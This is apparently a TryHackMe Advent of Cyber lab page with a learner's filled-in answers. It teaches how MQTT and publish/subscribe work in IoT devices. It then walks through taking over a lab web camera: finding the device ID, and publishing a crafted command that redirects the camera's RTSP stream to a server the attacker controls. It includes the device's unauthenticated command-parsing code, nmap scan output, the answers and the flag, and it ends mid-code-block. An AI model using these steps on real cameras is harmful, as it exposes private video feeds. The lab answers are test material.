# Task#26 - [Day 21] MQTT Have yourself a merry little webcam

## The Story

![Task banner for day 21](/tryhackme.com/adventofcyber4/file/b6bf90fa41691cf902d80ca62eff81fd.png)  

After investigating the web camera implant through hardware and firmware reverse engineering, you are tasked with identifying and exploiting any known vulnerabilities in the web camera. Elf Mcskidy is confident you won't be able to compromise the web camera as it seems to be up-to-date, but we will investigate if off-the-shelf exploits are even needed to take back control of the workshop.

Check out Alh4zr3d's video walkthrough for Day 21 [here](https://www.youtube.com/watch?v=sqVKpAHZu9s)!  

Learning Objectives  

* Explain the Internet of Things, why it is important, and if we should be concerned about their danger.
* Understand the difference between an IoT-specific protocol and other network service protocols.
* Understand what a publish/subscribe model is and how it interacts with IoT devices.
* Analyze and exploit the behavior of a vulnerable IoT device.

## What is the Internet of Things

The **I**nternet **o**f **T**hings (**IoT**) defines a categorization of just that, “things”. Devices are interconnected and rely heavily on communication to achieve a device’s objectives. Examples of IoT include thermostats, web cameras, and smart fridges, to name only a few.

![elf](/tryhackme.com/adventofcyber4/file/3db4fb129fb5cbfe9c34d9d092d6bf19.png)

While the formal definition of IoT may change depending on who is setting it, the term can best be used as a broad categorization of “a device that sends and receives data to communicate with other devices and systems.”

If IoT defines such an extensive categorization of devices with varying capabilities and objectives, what makes them important or warrants that we study them? While several justifiable reasons exist to study IoT, we will address three possible answers.

First, IoT categorizes unique devices, e.g., smart fridges, that don't match other categories, such as mobile devices. IoT devices tend to be lightweight, which means that the device's functionality and features are limited to only essentials. Because of their lightweight nature, modern features may be left out or overlooked, one of the most concerning being security. While we live in a modern era of security, it may still be considered secondary, which is why it is not included in core functionality.

Second, devices are interconnected and often involve no human interaction. Think of authentication in which a human uses a password for security; these devices must not only be designed to communicate data effectively but also negotiate a secure means of communication such that human interaction is not required, e.g., using a password.

Third, devices are designed to all be interconnected, so if *device a* is using *x protocol* and *device b* is using *y protocol*, it presents a significant problem in compatibility. The same concept can be applied to security where devices are incompatible but could fall back to insecure communication.

Remember, security is often thought of as secondary, so not ensuring a device can securely communicate with other devices may be a fatal weakness that is overlooked or deemed less important.

In the next section, we will cover how IoT protocols function and study examples of how devices may or may not address the flaws proposed above.

## Introduction to IoT Protocols

An "IoT protocol" categorizes any protocol used by an IoT device for **machine-to-machine**, **machine-to-gateway**, or **machine-to-cloud** communication. As previously defined, an IoT device sends and receives data to communicate with other devices and systems; with this in mind, an IoT protocol's objective should be *efficient*, *reliable*, and *secure* data communication.

We can break up IoT protocols into one of two types, an **IoT data protocol** or an **IoT network protocol**. These types may be deceiving in their name as both are used to communicate data. How they differentiate is how and where the communication occurs. At a glance, an IoT data protocol commonly relies on the **TCP/IP** (**T**ransmission **C**ontrol **P**rotocol/**I**nternet **P**rotocol) model, and an IoT network protocol relies on wireless technology for communication. We will continue expanding the purpose of these protocol types below.

Let's break down an IoT data protocol into concepts that may be more familiar to us. An IoT data protocol is akin to common network services you may use or interact with daily, such as HTTP, SMB, FTP, and others. In fact, HTTP can be used as the backbone for other IoT protocols or as an IoT data protocol itself.

An IoT network or wireless protocol still maintains the same goals as data protocols, that is, data communication, but it achieves it differently. Rather than relying on traditional TCP protocols, these protocols use wireless technology such as Wi-Fi, Bluetooth, ZigBee, and Z-Wave to transfer data and communicate between entities.

Throughout this task, we will focus on the former category of protocols and how they interact with IoT devices.

So then, let's dive deeper into IoT data protocols and what makes them… well, a data protocol.

## Messaging Protocols and Middleware

Because data communication is the primary objective of IoT data protocols, they commonly take the form of a **messaging protocol**; that is, the protocol facilities the **sending** and **receiving** of a **message** or **payload** between two parties.

Messaging protocols communicate between two devices through an independent server (”**middleware**”) or by negotiating a communication method amongst themselves.

Devices commonly use middleware because they must be lightweight and efficient; for example, an IoT device may not support a more robust protocol, such as HTTP. A server is placed in the middle of two clients who want to communicate to translate the communication method to a means both devices can understand, given their technology.

![Diagram of middleware translating data between client A and client B](/tryhackme.com/adventofcyber4/file/495796497ee8356484689b008de96184.png)  

Recall how we mentioned that the combability of device protocols could be a problem; middleware fixes some of the associated issues but may still be unable to translate all communications.

Below is a brief synopsis of popular messaging protocols used by IoT devices.

| **Protocol** | **Communication Method** | **Description** |
| --- | --- | --- |
| MQTT (Message Queuing Telemetry Transport) | Middleware | A lightweight protocol that relies on a publish/subscribe model to send or receive messages. |
| CoAP (Constrained Application Protocol) | Middleware | Translates HTTP communication to a usable communication medium for lightweight devices. |
| AMQP (Advanced Message Queuing Protocol) | Middleware | Acts as a transactional protocol to receive, queue, and store messages/payloads between devices. |
| DDS (Data Distribution Service | Middleware  | A scalable protocol that relies on a publish/subscribe model to send or receive messages.  |
| HTTP (Hypertext Transfer Protocol) | Device-to-Device | Used as a communication method from traditional devices to lightweight devices or for large data communication. |
| WebSocket  | Device-to-Device | Relies on a client-server model to send data over a TCP connection. |

We will continue diving deeper into the MQTT protocol and potentially related security issues throughout this task.

## Functionality of a Publish/Subscribe Model

Messaging protocols commonly use a **publish/subscribe model**, notably the **MQTT protocol**. The model relies on a broker to negotiate **"published" messages** and **"subscription" queries**. Let's first look at a diagram of this process and then break it down further.

![Diagram of a broker facilitating the communication between a publisher and subscriber](/tryhackme.com/adventofcyber4/file/9af9a374b9401e1f61d200240752c012.png)

Based on the above diagram,

1. A publisher sends their message to a broker.
2. The broker continues relaying the message until a new message is published.
3. A subscriber can attempt to connect to a broker and receive a message.

The protocol should work fantastically if a single broker is needed for one device's objective, but what if several types of data need to be sent from one device or several publishers and subscribers need to connect to one broker? Using more than one broker can be feasible but increases unnecessary overhead and server usage.

A secure communication method should also ensure the integrity of messages, meaning one publisher should not overwrite another.

To address these problems, a broker can store multiple messages from different publishers by using **topics**. A topic is a semi-arbitrary value pre-negotiated by the publisher and subscriber and sent along with a message. The format of a topic commonly takes the form of `<name>/<id>/<function>`. When a new message is sent with a given topic, the broker will store or overwrite it under the topic and relay it to subscribers who have "subscribed" to it.

Below is a diagram showing two publishers sending different messages associated with topics.

![Diagram of multiple publishers sending messages with topics to a single broker](/tryhackme.com/adventofcyber4/file/bc178e6c7cf7ad59bafa6029a4dc006e.png)

Below is a diagram of several subscribers receiving messages from separate topics of a broker.

![Diagram of multiple subscribers requesting messages from several topics from a single broker](/tryhackme.com/adventofcyber4/file/a8df1ae7f4eafc5aee7cec79e195c71d.png)

Note the *asynchronous* nature of this communication; the publisher can publish at any time, and the subscriber can subscribe to a topic to see if the broker relaid messages. Typically, subscribers and publishers will continue attempting to connect to the broker for a specific duration.

Well, we should now understand the functionality of this model, but why would an IoT device use it?

A publish/subscribe model is helpful for any data maintained asynchronously or received by several different devices from one publisher.

A common example of a publish/subscribe model could be a thermostat publishing its current temperature. Several thermostats can publish to one broker, and several devices can subscribe to the thermostat they want data from.

As a protocol specifically, MQTT is also lightweight, with a small footprint and minimal bandwidth.

## Are IoT Protocols Inherently Vulnerable?

We've identified the relation between IoT protocols and network services and how messaging protocols function. This still leaves the question of how secure IoT protocols are.

Let's apply this to something we are more familiar with, HTTP. "HTTP vulnerabilities" often refer to a vulnerability in the software/application built off the protocol; this does not mean protocols are absent of vulnerabilities, but they generally possess strict requirements and require revisions before release or public adoption.

Similarly, IoT protocols are not inherently vulnerable, so what makes an IoT device insecure?

Before giving a more formal explanation, let's consider the default settings of MQTT when it is first deployed. An MQTT broker assigns all devices connected to it read/write access to all topics; that is, any device can publish and subscribe to a topic. We may be okay with this idea at first; in the thermostat example, we are only communicating temperatures, so the integrity of the data should not be an issue. But let's dive into this issue more.

Our data should follow CIA (Confidentiality, Integrity, and Availability) best practices as closely as possible; that is, data should not be read or manipulated by unauthorized sources and should be accessible to authorized users. Following best practices, authentication and authorization should be implemented to prevent potentially bad actors from compromising any principle of the CIA triad.

What is the risk to IoT devices if best practices are not considered? Risk is almost solely dependent on the behavior of a device. Let's say a device trusts an MQTT publisher and parses data or commands to perform actions affecting the device's settings. An attacker could send a malicious message to perform unintended actions. For example, a thermostat sends a message with a specific format to a broker, and a subscriber parses the message and changes the temperature. An attacker could send their message outside of the intended application (e.g., a mobile app) to modify the device's temperature. Although this example may seem modest, imagine the impact this could have on other devices with consequences or critical devices, which are essential to the function of a society and/or economy.

To recap, an MQTT instance may be insecure due to improper data regulation best practices. An instance may be vulnerable if the device's behavior allows an attacker to perform malicious actions from expected interaction.

Note the differentiation between insecure and vulnerable; an insecure implementation may allow an attacker to exploit a vulnerability, but this does not mean the implementation is inherently vulnerable.

In the next task, we will expand this idea and attempt to identify methods we can use to identify the behavior of a given device.

## Abusing Device Behavior

Before moving on to the hands-on section, let's address how we can identify information about device behavior.

We've defined that IoT devices are vulnerable because of their applications' behavior. Now let's briefly look at how we can analyze a device's behavior for vulnerable entry points and how they can be abused.

An attacker can discover device behavior from communication sniffing, source code analysis, or documentation.

* **Communication sniffing** can determine the protocol used, the middleware or broker address, and the communication behavior. For example, unencrypted HTTP requests are sent to a central server, which are then translated to CoAP packets. We can observe the HTTP packets and look for topics or message formats that vendors should hide, e.g. settings, commands, etc., to interact with the device.
* **Source code analysis** can give you direct insight into how a device parses sent data and how it is being used. Analysis can identify similar information to communication sniffing but may act as a more reliable and definite source of information.
* **Documentation** provides you with a clear understanding of the standard functionality of a device or endpoint. A disadvantage of only using documentation as a means of identification is that it may leave out sensitive payloads, topics, or other information that is not ordinarily relevant to an end user that we, as attackers want.

![elf](/tryhackme.com/adventofcyber4/file/86c6456b29440fe8c7318f6d28c6d99f.png)

Once a behavior is identified, we can use clients to interact with devices and send malicious messages/payloads.

To cement this concept, let's go back to the thermostat example and see how an attacker may attempt to control the device.

Most IoT devices have a device ID that they use to identify themselves to other devices and that other devices can use to identify the target device. Devices must exchange this device ID before any other communication can occur. In the case of MQTT, a device ID is commonly exchanged by publishing a message containing the device ID to a pre-known topic that anyone can subscribe to.  

Once an attacker knows the device ID and behavior of a target device they can attempt to target specific topics or message formats. These topics may trust the message source and perform some action blindly (e.g. change a temperature, change a publishing destination, etc.)

In our scenario, preliminary information has been identified by Recon McRed through hardware analysis and firmware reverse engineering. The web camera device is known to use the MQTT protocol, and we have a list of potential topics we can target. Before analyzing these potentially vulnerable topics, let's look at how we may interact with an MQTT endpoint normally.

## Interacting with MQTT

How do we interact with MQTT or other IoT protocols? Different protocols will have different libraries or other means of interacting with them. For MQTT, there are two commonly used libraries we will discuss, that is, **Paho** and **Mosquitto**. Paho is a python library that offers support for all features of MQTT. Mosquitto is a suite of MQTT utilities that include a broker and publish/subscribe clients that we can use from the command line.

In this task, we will introduce the Mosquitto clients and their functionality; in the next task, we will leverage the clients against a vulnerable device to get hands-on.

### Subscribing to a Topic

We can use the [mosquitto\_sub](https://mosquitto.org/man/mosquitto_sub-1.html) client utility to subscribe to an MQTT broker.

By default, the subscription utility will connect a localhost broker and only require a topic to be defined using the `-t` or **`—topic`** flag. Below is an example of connecting to a localhost and subscribing to the topic, *device/ping*.

`mosquitto_sub -t device/ping`

You can also specify a remote broker using the `-h` flag. Below is an example of connecting to *example.thm* and subscribing to the topic, *device/thm*.

`mosquitto_sub -h example.thm -t device/thm`

### Publishing to a Topic

We can use the [mosquitto\_pub](https://mosquitto.org/man/mosquitto_pub-1.html) client utility to publish to an MQTT broker.

To publish a message to a topic is nearly identical to that of the subscription client. This time, however, we need to include a `-m` or `—message` flag to denote our message/payload. Below is an example of publishing to the topic, *device/info* on the host, *example.thm* with the message, *"This is an example."*

`mosquitto_pub -h example.thm -t device/info -m "This is an example"`

For both clients, there are several notable optional flags that we will briefly mention,

![elf](/tryhackme.com/adventofcyber4/file/fbce96757ec751ebe2893a9f4eef0322.png)

* `-d`: Enables debug messages.
* `-i` or `—id`: Specifies the id to identify the client to the server.
* `-p` or `—port`: Specifies the port the broker is using. Defaults to port `1883`.
* `-u` or `—username`: Used to specify the username for authentication.
* `-P` or `—password`: Used to specify the password for authentication.
* `—url`: Used to specify username, password, host, port, and topic in one URL.

A device using MQTT will craft messages as a means of communication authentically. As an attacker, we will attempt to portray our publishing source as a legitimate source in hopes that the other side will interact with the message as it would an authentic message to provide us with unintended behavior.

## Practical Application

We have covered all of the information needed to successfully approach exploiting an insecure data communication implementation of an IoT device. Let’s try to take what we have learned and apply it to the unknown web camera identified in Santa’s Workshop.

First, let's start the Virtual Machine by pressing the Start Machine button at the top of this task. Please allow the machine at least 5 minutes to deploy before interacting with it. You may interact with the VM using the AttackBox or your VPN connection.

Note: The in-browser attack box has been appropriately configured for this task, and we highly recommend using it for the duration of this task. If you are using your personal virtual machine, we will address some specific configurations that you must do for the attack to work successfully.

As briefly covered previously, we know the following:  

* The device interacts with an MQTT broker to publish and subscribe to pre-defined topics.
* The device broker is found at `MACHINE_IP`.
* From firmware reverse engineering, we know that the device uses these two topics
  * `device/init`
    * Publishes the device ID of the current device
  * `device/<id>/cmd`
    * Subscribes to the device ID-specific topic to receive commands and settings.
* The device is known to use **RTSP** (Real Time Streaming Protocol) for input streaming.
* If an attacker can control where and how the RTSP stream is forwarded, they can redirect it to an RTSP server they control.
  * The `device/<id>/cmd` topic can specify a behavior through a numeric CMD parameter and the ability to parse a key-value pair to be used to interact with the device.

We do not yet possess how the command topic behaves or the format it is expecting the message. It is up to you to craft a malicious message to target the command topic. If you are looking for a challenge, we have provided you with a small source code snippet extracted from the device firmware that you can use to gather communication behavior from. Otherwise, we have collected the information you need with the expected format and behavior of the device.

### Device source code snippet (click to read)

```c
def subscribe(client: mqtt_client):
    def on_message(client, userdata, msg):
        payload = msg.payload.decode()
        topic = msg.topic
        print("Topic:", topic)
        print("Payload:", payload)
        print("Parsing payload...")
        payload = payload.replace("{", "")
        payload = payload.replace("}", "")
        payload = payload.split(",")
        CMD = 0
        URL = 1
        command_payload = payload[CMD]
        url_payload = payload[URL]
        print(command_payload)
        print(url_payload)
        target_cmd = "10"
        CMD_NAME = 0
        CMD_VALUE = 1
        URL_NAME = 0
        URL_VALUE = 1
        command_payload = command_payload.split(":")
        url_payload = url_payload.split(":", 1)
        if command_payload[CMD_NAME].lower() == "cmd":
            if command_payload[CMD_VALUE] == target_cmd:
                print("Command value match")
                if url_payload[URL_NAME].lower() == "url":
                    print("RTSPS URL match:", url_payload[URL_VALUE])
                    try:
                        f = open("../src/url.txt", "x")
                        f.write(url_payload[URL_VALUE])
                        f.close()
                    except:
                        f = open("../src/url.txt", "w")
                        f.write(url_payload[URL_VALUE])
                        f.close()
                        
                    subprocess.call("../deploy/update.sh")

    client.subscribe(topic)
    client.on_message = on_message 
```

### Web camera expected device behavior (click to read)

* The expected format of the message is `{”CMD”:value,”URL”:"value"}`
  * Note the format for quotes must match exactly, and double quotes must wrap the entire message. You can also use triple quote formatting to wrap all values and parameters in quotes.
* The CMD value to overwrite/redirect the RTSP URL is `10`
* The URL value should be the *eth0* or *ens0* interface address of the attacking machine hosting the RTSP server and an RTSP path of your choosing.
  * `RTSP://xxx.xxx.xxx.xxx:8554/path`

To get you started, we have provided steps for exploitation set up below,

1. Verify that `MACHINE_IP` is an MQTT endpoint and uses the expected port with *Nmap*.
2. Use `mosquitto_sub` to subscribe to the `device/init` topic to enumerate the device and obtain the device ID.
3. Start an RTSP server using [rtsp-simple-server](https://github.com/aler9/rtsp-simple-server)

    * `docker run --rm -it --network=host aler9/rtsp-simple-server`
    * Note the port number for *RTSP*; we will use this in the URL you send in your payload.
    * If you are having issues receiving a connection and are confident that your formatting is correct, you can attempt to use a TCP listener - `sudo docker run --rm -it -e RTSP_PROTOCOLS=tcp -p 8554:8554 -p 1935:1935 -p 8888:8888 aler9/rtsp-simple-server`

4. Use `mosquitto_pub` to publish your payload to the `device/<id>/cmd` topic.

    ![elf](/tryhackme.com/adventofcyber4/file/f8718ce9f1f93a9fa01ce70eed9d0be0.png)

    * Recall that your URL must use the attackbox IP address or respective interface address if you are using the VPN and be in the format of `rtsp://xxx.xxx.xxx.xxx:8554/path`
    * If the message was correctly interpreted and the RTSP stream was redirected the server should show a successful connection and may output warnings from dropped packets.

5. You can view what is being sent to the server by running VLC and opening the server path of the locally hosted RTSP server.

    * `vlc rtsp://127.0.0.1:8554/path`
    * If you are using Kali, you must download VLC from the *snap* package manager to ensure the proper codecs are installed.

If you see a stream in VLC, congratulations, you have verified a takeover of the web camera stream. If you did not see the stream and are confident you followed the steps correctly and have tried the suggested remediations, restart the machine and ensure you wait 5 minutes before interacting with it.

Note the stream may take up to one minute to begin forwarding due to packet loss.

## Questions

1. What port is Mosquitto running on? **1883**

    ```bash
    root@ip-10-10-64-204:~# nmap 10.10.83.111 -p- -vv -min-rate 1500

    Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-23 18:16 GMT
    Initiating ARP Ping Scan at 18:16
    Scanning 10.10.83.111 [1 port]
    Completed ARP Ping Scan at 18:16, 0.22s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 18:16
    Completed Parallel DNS resolution of 1 host. at 18:16, 0.00s elapsed
    Initiating SYN Stealth Scan at 18:16
    Scanning ip-10-10-83-111.eu-west-1.compute.internal (10.10.83.111) [65535 ports]
    Discovered open port 80/tcp on 10.10.83.111
    Discovered open port 22/tcp on 10.10.83.111
    Increasing send delay for 10.10.83.111 from 0 to 5 due to 85 out of 281 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 5 to 10 due to 87 out of 289 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 10 to 20 due to 93 out of 308 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 20 to 40 due to 93 out of 309 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 40 to 80 due to 91 out of 301 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 80 to 160 due to 94 out of 313 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 160 to 320 due to max_successful_tryno increase to 4
    Increasing send delay for 10.10.83.111 from 320 to 640 due to 263 out of 875 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 640 to 1000 due to 88 out of 293 dropped probes since last increase.
    Discovered open port 1883/tcp on 10.10.83.111
    SYN Stealth Scan Timing: About 38.55% done; ETC: 18:17 (0:00:49 remaining)
    Completed SYN Stealth Scan at 18:18, 87.68s elapsed (65535 total ports)
    Nmap scan report for ip-10-10-83-111.eu-west-1.compute.internal (10.10.83.111)
    Host is up, received arp-response (0.00049s latency).
    Scanned at 2022-12-23 18:16:39 GMT for 88s
    Not shown: 65532 closed ports
    Reason: 65532 resets
    PORT     STATE SERVICE REASON
    22/tcp   open  ssh     syn-ack ttl 64
    80/tcp   open  http    syn-ack ttl 64
    1883/tcp open  mqtt    syn-ack ttl 64
    MAC Address: 02:82:A9:1D:04:9B (Unknown)

    Read data files from: /usr/bin/../share/nmap
    Nmap done: 1 IP address (1 host up) scanned in 88.10 seconds
            Raw packets sent: 131358 (5.780MB) | Rcvd: 240489 (31.108MB)
    ```

    **Hint:** `nmap -p-  -vv --min-rate 1500`

2. Is the *device/init* topic enumerated by Nmap during a script scan of all ports? (y/n) **y**

    ```bash
    root@ip-10-10-64-204:~# nmap 10.10.83.111 -sC -sV -p- -vv --min-rate 1500

    Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-23 18:29 GMT
    NSE: Loaded 146 scripts for scanning.
    NSE: Script Pre-scanning.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 18:29
    Completed NSE at 18:29, 0.00s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 18:29
    Completed NSE at 18:29, 0.00s elapsed
    Initiating ARP Ping Scan at 18:29
    Scanning 10.10.83.111 [1 port]
    Completed ARP Ping Scan at 18:29, 0.22s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 18:29
    Completed Parallel DNS resolution of 1 host. at 18:29, 0.00s elapsed
    Initiating SYN Stealth Scan at 18:29
    Scanning ip-10-10-83-111.eu-west-1.compute.internal (10.10.83.111) [65535 ports]
    Discovered open port 80/tcp on 10.10.83.111
    Discovered open port 22/tcp on 10.10.83.111
    Increasing send delay for 10.10.83.111 from 0 to 5 due to 85 out of 283 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 5 to 10 due to 90 out of 299 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 10 to 20 due to 96 out of 319 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 20 to 40 due to 90 out of 298 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 40 to 80 due to 94 out of 312 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 80 to 160 due to 91 out of 302 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 160 to 320 due to 93 out of 308 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 320 to 640 due to 93 out of 308 dropped probes since last increase.
    Increasing send delay for 10.10.83.111 from 640 to 1000 due to 92 out of 305 dropped probes since last increase.
    Discovered open port 1883/tcp on 10.10.83.111
    SYN Stealth Scan Timing: About 39.79% done; ETC: 18:30 (0:00:47 remaining)
    Completed SYN Stealth Scan at 18:31, 87.36s elapsed (65535 total ports)
    Initiating Service scan at 18:31
    Scanning 3 services on ip-10-10-83-111.eu-west-1.compute.internal (10.10.83.111)
    Completed Service scan at 18:32, 73.18s elapsed (3 services on 1 host)
    NSE: Script scanning 10.10.83.111.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 18:32
    Completed NSE at 18:32, 5.37s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 18:32
    Completed NSE at 18:32, 0.00s elapsed
    Nmap scan report for ip-10-10-83-111.eu-west-1.compute.internal (10.10.83.111)
    Host is up, received arp-response (0.00090s latency).
    Scanned at 2022-12-23 18:29:37 GMT for 167s
    Not shown: 65532 closed ports
    Reason: 65532 resets
    PORT     STATE SERVICE                 REASON         VERSION
    22/tcp   open  ssh                     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
    80/tcp   open  http                    syn-ack ttl 64 WebSockify Python/3.8.10
    | fingerprint-strings: 
    |   GetRequest: 
    |     HTTP/1.1 405 Method Not Allowed
    |     Server: WebSockify Python/3.8.10
    |     Date: Fri, 23 Dec 2022 18:31:09 GMT
    |     Connection: close
    |     Content-Type: text/html;charset=utf-8
    |     Content-Length: 472
    |     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
    |     "http://www.w3.org/TR/html4/strict.dtd">
    |     <html>
    |     <head>
    |     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
    |     <title>Error response</title>
    |     </head>
    |     <body>
    |     <h1>Error response</h1>
    |     <p>Error code: 405</p>
    |     <p>Message: Method Not Allowed.</p>
    |     <p>Error code explanation: 405 - Specified method is invalid for this resource.</p>
    |     </body>
    |     </html>
    |   HTTPOptions: 
    |     HTTP/1.1 501 Unsupported method ('OPTIONS')
    |     Server: WebSockify Python/3.8.10
    |     Date: Fri, 23 Dec 2022 18:31:09 GMT
    |     Connection: close
    |     Content-Type: text/html;charset=utf-8
    |     Content-Length: 500
    |     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
    |     "http://www.w3.org/TR/html4/strict.dtd">
    |     <html>
    |     <head>
    |     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
    |     <title>Error response</title>
    |     </head>
    |     <body>
    |     <h1>Error response</h1>
    |     <p>Error code: 501</p>
    |     <p>Message: Unsupported method ('OPTIONS').</p>
    |     <p>Error code explanation: HTTPStatus.NOT_IMPLEMENTED - Server does not support this operation.</p>
    |     </body>
    |_    </html>
    |_http-server-header: WebSockify Python/3.8.10
    |_http-title: Error response
    1883/tcp open  mosquitto version 1.6.9 syn-ack ttl 64
    | mqtt-subscribe: 
    |   Topics and their most recent payloads: 
    |     $SYS/broker/bytes/sent: 18884
    |     $SYS/broker/version: mosquitto version 1.6.9
    |     $SYS/broker/publish/bytes/sent: 10460
    |     $SYS/broker/load/messages/sent/1min: 9.53
    |     $SYS/broker/load/bytes/sent/15min: 242.06
    |     $SYS/broker/load/publish/received/1min: 5.75
    |     $SYS/broker/load/bytes/received/15min: 225.43
    |     $SYS/broker/load/messages/received/1min: 9.53
    |     $SYS/broker/bytes/received: 15031
    |     $SYS/broker/store/messages/bytes: 219
    |     $SYS/broker/uptime: 3883 seconds
    |     $SYS/broker/publish/messages/sent: 522
    |     $SYS/broker/load/bytes/sent/1min: 209.70
    |     $SYS/broker/publish/messages/received: 391
    |     $SYS/broker/messages/sent: 782
    |     $SYS/broker/publish/bytes/received: 7944
    |     $SYS/broker/messages/received: 656
    |     $SYS/broker/load/publish/sent/1min: 5.75
    |     $SYS/broker/load/publish/sent/5min: 5.97
    |     $SYS/broker/load/sockets/1min: 0.30
    |     $SYS/broker/load/bytes/sent/5min: 217.38
    |     $SYS/broker/load/publish/received/5min: 5.94
    |     $SYS/broker/load/connections/1min: 0.37
    |     $SYS/broker/load/messages/sent/15min: 10.74
    |     $SYS/broker/load/bytes/received/5min: 219.51
    |     $SYS/broker/load/messages/received/15min: 10.09
    |     $SYS/broker/load/messages/sent/5min: 10.03
    |     $SYS/broker/load/messages/received/5min: 10.01
    |     $SYS/broker/load/bytes/received/1min: 214.58
    |_    $SYS/broker/load/publish/sent/15min: 6.65
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port80-TCP:V=7.60%I=7%D=12/23%Time=63A5F3EC%P=x86_64-pc-linux-gnu%r(Get
    SF:Request,291,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\x2
    SF:0WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2023\x20Dec\x202022\x2
    SF:018:31:09\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html;
    SF:charset=utf-8\r\nContent-Length:\x20472\r\n\r\n<!DOCTYPE\x20HTML\x20PUB
    SF:LIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x
    SF:20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x
    SF:20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Con
    SF:tent-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x
    SF:20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x20</head>
    SF:\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20
    SF:response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20405
    SF:</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Method\x20Not\x20A
    SF:llowed\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20expla
    SF:nation:\x20405\x20-\x20Specified\x20method\x20is\x20invalid\x20for\x20t
    SF:his\x20resource\.</p>\n\x20\x20\x20\x20</body>\n</html>\n")%r(HTTPOptio
    SF:ns,2B9,"HTTP/1\.1\x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\nS
    SF:erver:\x20WebSockify\x20Python/3\.8\.10\r\nDate:\x20Fri,\x2023\x20Dec\x
    SF:202022\x2018:31:09\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20t
    SF:ext/html;charset=utf-8\r\nContent-Length:\x20500\r\n\r\n<!DOCTYPE\x20HT
    SF:ML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\
    SF:x20\x20\x20\x20\"http://www\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\
    SF:x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-eq
    SF:uiv=\"Content-Type\"\x20content=\"text/html;charset=utf-8\">\n\x20\x20\
    SF:x20\x20\x20\x20\x20\x20<title>Error\x20response</title>\n\x20\x20\x20\x
    SF:20</head>\n\x20\x20\x20\x20<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>
    SF:Error\x20response</h1>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20cod
    SF:e:\x20501</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Message:\x20Unsupport
    SF:ed\x20method\x20\('OPTIONS'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p
    SF:>Error\x20code\x20explanation:\x20HTTPStatus\.NOT_IMPLEMENTED\x20-\x20S
    SF:erver\x20does\x20not\x20support\x20this\x20operation\.</p>\n\x20\x20\x2
    SF:0\x20</body>\n</html>\n");
    MAC Address: 02:82:A9:1D:04:9B (Unknown)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    NSE: Script Post-scanning.
    NSE: Starting runlevel 1 (of 2) scan.
    Initiating NSE at 18:32
    Completed NSE at 18:32, 0.00s elapsed
    NSE: Starting runlevel 2 (of 2) scan.
    Initiating NSE at 18:32
    Completed NSE at 18:32, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 167.40 seconds
            Raw packets sent: 130994 (5.764MB) | Rcvd: 239745 (31.002MB)
    ```

    **Hint:** `nmap -sC -sV -p-  -vv --min-rate 1500`

3. What Mosquitto version is the device using?  **1.6.9**

    **Hint:** Found from the `$SYS$⁄broker⁄version` topic

4. What flag is obtained from viewing the RTSP stream? **THM{UR_CAMERA_IS_MINE}**

    The device id is _K4OAUPTZUTST1T6LNDYL_ which can be located by subscribing to the `device/init` topic.

    ```bash
